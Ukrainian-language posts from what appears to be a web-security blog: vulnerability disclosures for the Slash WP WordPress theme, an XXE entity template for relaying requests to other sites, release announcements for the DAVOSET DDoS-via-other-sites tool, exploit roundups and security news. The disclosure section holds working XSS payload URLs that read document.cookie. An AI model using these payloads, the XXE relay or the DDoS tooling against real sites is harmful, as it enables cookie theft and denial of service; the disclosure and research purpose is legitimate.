Websecurity - Веб безпека

Виявлене переповнення буфера в PHP.

Уразливі версії: PHP 5.4.

Переповнення буфера у функції quoted_printable_encode().

• Heap-based overflow in PHP (деталі)

11.04.2013

У січні, 31.01.2013, я знайшов Full path disclosure, Cross-Site Scripting та Content Spoofing уразливості в темі Slash WP для WordPress. Про що найближчим часом повідомлю розробникам шаблону.

Раніше я вже писав про уразливості в темі Chocolate WP для WordPress від цих розробників.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.06.2013

Full path disclosure (WASC-13):

http://site/wp-content/themes/slash-wp/

FPD в index.php та інших php-файлах в папці плагіна та підпапках.

Cross-Site Scripting (WASC-08):

В темі використовується jPlayer 2.1.0 та JW Player 5.8.2011, про уразливості в яких я вже писав.

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

На деяких сайтах з цією темою флешка JW Player є, на інших немає. Згідно з описом теми, JW Player підтримується темою, але не входить в стандартну поставку (лише jPlayer). Але його можна встановити окремо, що і роблять деякі власники сайтів.

Content Spoofing (WASC-12):

Про Content Spoofing уразливості та про інші XSS уразливості в JW Player та в jPlayer, ми можете прочитати у відповідних записах.

Уразливі всі версії теми Slash WP для WordPress.

В статті Використання XML External Entities (XXE) для атак на інші сайти я вже розповідав про XXE уразливості, що можуть використовуватися для атак на інші сайти. І зараз я продовжу тему використання XXE уразливостей для DoS і DDoS атак.

В класифікації уразливостей WASC TC v2.0 є такий клас як XML External Entities (XXE) (WASC-43). Який ще називають XXE Injection.

Окрім використання даних уразливостей для читання вмісту локальних файлів, їх можна використати для з’єднання з зовнішніми серверами. Тобто можна робити запити до інших веб сайтів і через дані уразливості можна проводити CSRF і DoS атаки на інші сайти.

Атака відбувається через тег ENTITY. Якщо в ньому вказати зовнішній ресурс - “http://site/page”, то відбудеться запит до сторінки зовнішнього сайта. Що можна використати для атак на зовнішні сайти, як я писав в попередній статті.

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT methodName ANY>
  <!ENTITY xxe SYSTEM "http://site/page" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>

XXE Injection уразливості були виявлені в багатьох продуктах. Окрім раніше згаданих продуктів, наведу нові програми з XXE уразливостями:

• libraptor - уразливість в бібліотеці, що використовується багатьма програмами, зокрема офісними пакетами. Аналогічно її можуть використовувати й веб додатки (зокрема Ruby підтримує бібліотеку libraptor), які будуть вразливі для даних атак.
• Advanced XML Reader - плагін для WordPress.
• PHP 5.3 і 5.4 - дана уразливість була виправлена PHP 5.3.23 та PHP 5.4.13. В попередніх версіях PHP, веб додатки, що працюють з SOAP WSDL-файлами, можуть використовуватися для даних атак.
• WordPress 3.5 і 3.5.1 - окрім плагінів для WP, XXE уразливість також є в самому движку.
• Sybase EAServer - вразливі 6.3.1 та попередні весії.
• Spring Framework - вразливі додатки, що використовують даний framework.

Для автоматизації атак на інші сайти можна використати такий інструмент як DDoS attacks via other sites execution tool (DAVOSET). Abuse of Functionality дірки передбачали відправлення як GET, так і POST запитів. DAVOSET був розроблений для GET запитів.

XXE Injection атака передбачає відправлення спеціального XML-запиту методом POST. Тому інструмент для проведення атак на інші сайти через XXE уразливості повинен підтримувати POST метод. І його підтримку я планую додати в DAVOSET.

Виявлені численні уразливості безпеки в Apple Safari та WebKit.

Уразливі версії: Apple Safari 6.0.

Численні пошкодження пам’яті і міжсайтовий скриптінг.

• APPLE-SA-2013-06-04-2 Safari 6.0.5 (деталі)

В даній добірці експлоіти в веб додатках:

• Airlive IP Cameras - Multiple Vulnerabilities (деталі)
• TP-LINK TL-SC3171 Authentication Bypass Vulnerability (деталі)
• Exim sender_address Parameter - RCE Exploit (деталі)
• MS13-037 Microsoft Internet Explorer textNode Use-After-Free (деталі)
• Quick TFTP Server 2.2 - Denial of Service (деталі)

Сьогодні вийшла нова версія програми DAVOSET v.1.0.6. В новій версії:

• Додав нові сервіси в list_full.txt.
• Покращив визначення сторінки при відправленні запитів.
• Виправив баг з ітератором $i при тестуванні списку.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

У версії 1.0.6 я додав list_full.txt, що окрім 20 сервісів з основного списку, має також 10 додаткових сервісів з AoF уразливостями.

Скачати: DAVOSET_v.1.0.6.rar.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://onika-tattoo.in.ua - інфекція була виявлена 12.06.2013. Зараз сайт входить до переліку підозрілих.
• http://ecopulse.org.ua - інфекція була виявлена 28.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://titrov.net - інфекція була виявлена 03.06.2013. Зараз сайт входить до переліку підозрілих.
• http://dosk.kiev.ua - інфекція була виявлена 06.06.2013. Зараз сайт не входить до переліку підозрілих.
• http://kovroline.com.ua - інфекція була виявлена 04.04.2013. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Vulnerability in Cisco Prime LAN Management Solution (LMS) (деталі)
• Trimble Infrastructure GNSS Series Receivers Cross Site Scripting (XSS) vulnerability (деталі)
• DoS vulnerability in Squid (деталі)
• HP XP P9000 Command View Advanced Edition, Remote Denial of Service (DoS) (деталі)
• Fortinet FortiMail 400 IBE - Multiple Web Vulnerabilities (деталі)

Розмістив на сайті DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення атак на інші сайти (зокрема DoS і DDoS атак). Мій інструмент стане в нагоді при тестуванні Abuse of Functionality уразливостей і для доведення Інтернет спільноті небезпеки цих дірок. Що я намагався робити в своїх статтях в 2010 році та в описах уразливостей (починаючи з 2007 року), коли звертав увагу на подібні уразливості.

У липні 2010 року я розробив першу версію DAVOSET, а 18.07.2010 випустив версію 1.0.5, яку сьогодні й розмістив на сайті. Це остання версія мого інструменту DAVOSET. Після того я вже не займався його розробкою. Але зараз я планую продовжити розробку програми і випустити нові версії.

Три роки я тримав цей інструмент приватно, але зараз публікую його у відкритий доступ. Щоб всі бажаючи могли протестувати Abuse of Functionality уразливості на численних сайтах.

Так як в більшості випадків власники сайтів та веб розробники ігнорують і не виправляють їх. Що може бути використано для DoS атак як на інші сайти, так і на самі сайти з AoF уразливостями, про що я писав у статті Використання сайтів для атак на інші сайти.

У версії 1.0.5 присутній список list.txt з 20 уразливими сервісами на різних сайтах (про які я писав в новинах). Також існує більший список уразливих сервісів, до якого увійшли сайти, про які я писав в новинах вже після виходу цієї версії DAVOSET, і який я планую оприлюднити в наступній версії програми.

Скачати: DAVOSET_v.1.0.5.rar.

За повідомленням www.xakep.ru, Microsoft передає 0day-експлоіти владі до виходу патчів.

Інформаційне агентство Bloomberg опублікувало статтю про те, як різні ІТ-компанії - так звані “довірені партнери” - співробітничають зі спецслужбами і добровільно діляться інформацією. Окремо в статті називається компанія Microsoft.

Microsoft Corp., найбільший у світі розробник програмного забезпечення, надає розвідувальним агентствам інформацію про баги у популярному ПЗ до випуску виправлення у відкритий доступ, повідомили чиновники, знайомі з цим процесом. Цю інформацію можуть використовувати для захисту урядових комп’ютерів і доступу на комп’ютери терористів чи військового супротивника.

Про те, що Microsoft співробітничає зі спецслужбами, розмови йшли давно. І ось офіційне підтвердження - компанія надає їм 0day-експлоіти до своїх продуктів до офіційного випуску патчів.

За повідомленням ain.ua, за крадіжку $15 млн. у США затримані хакери, якими керували двоє киян.

Нещодавно федеральна прокуратура Нью-Джерсі висунула карні обвинувачення в спробі крадіжки $15 млн. із рахунків американських і закордонних банків проти вісьмох чоловік. Принаймні двоє з них - українці, й проживають у Києві.

Передбачається, що на чолі кіберзлочинної схеми стоїть 33-літній киянин Олексій Шарапка, якому допомагав Леонід Яновицкий 38-ми років, що також проживає в Києві. За словами прокурора Нью-Джерсі, на даний момент обоє знаходяться на волі. Кібершахрайська схема була спрямована на банки й урядові відомства в США.

За повідомленням www.xakep.ru, хостер Hetzner виявив бекдор.

Увечері 6 червня німецька хостінг-компанія Hetzner розіслала лист своїм клієнтам з повідомленням про інцидент із безпекою. На початку місяця співробітники Hetzner знайшли невідомий бекдор в одній із внутрішніх систем моніторингу. Негайно було організоване розслідування, яке виявило, що скомпрометовано також інтерфейс керування виділеними рут-серверами, а фрагмент клієнтської бази даних скопійований на віддалений ресурс.

Паролі користувачів хостера зберігаються у вигляді хешів SHA256 із сіллю. Крім паролів, у скомпрометованій базі даних була часткова інформація про платіжні карти: три останні цифри номера карти, тип карти і дата закінчення дії. Хоча паролі і захешовані, але користувачам хостінга пропонується терміново змінити паролі.

Про бекдор на серверах хостера Hostgator я вже писав раніше. Нещодавно також був взломаний Linode. Останнім часом взломи хостінг-провайдерів стали дуже поширеними.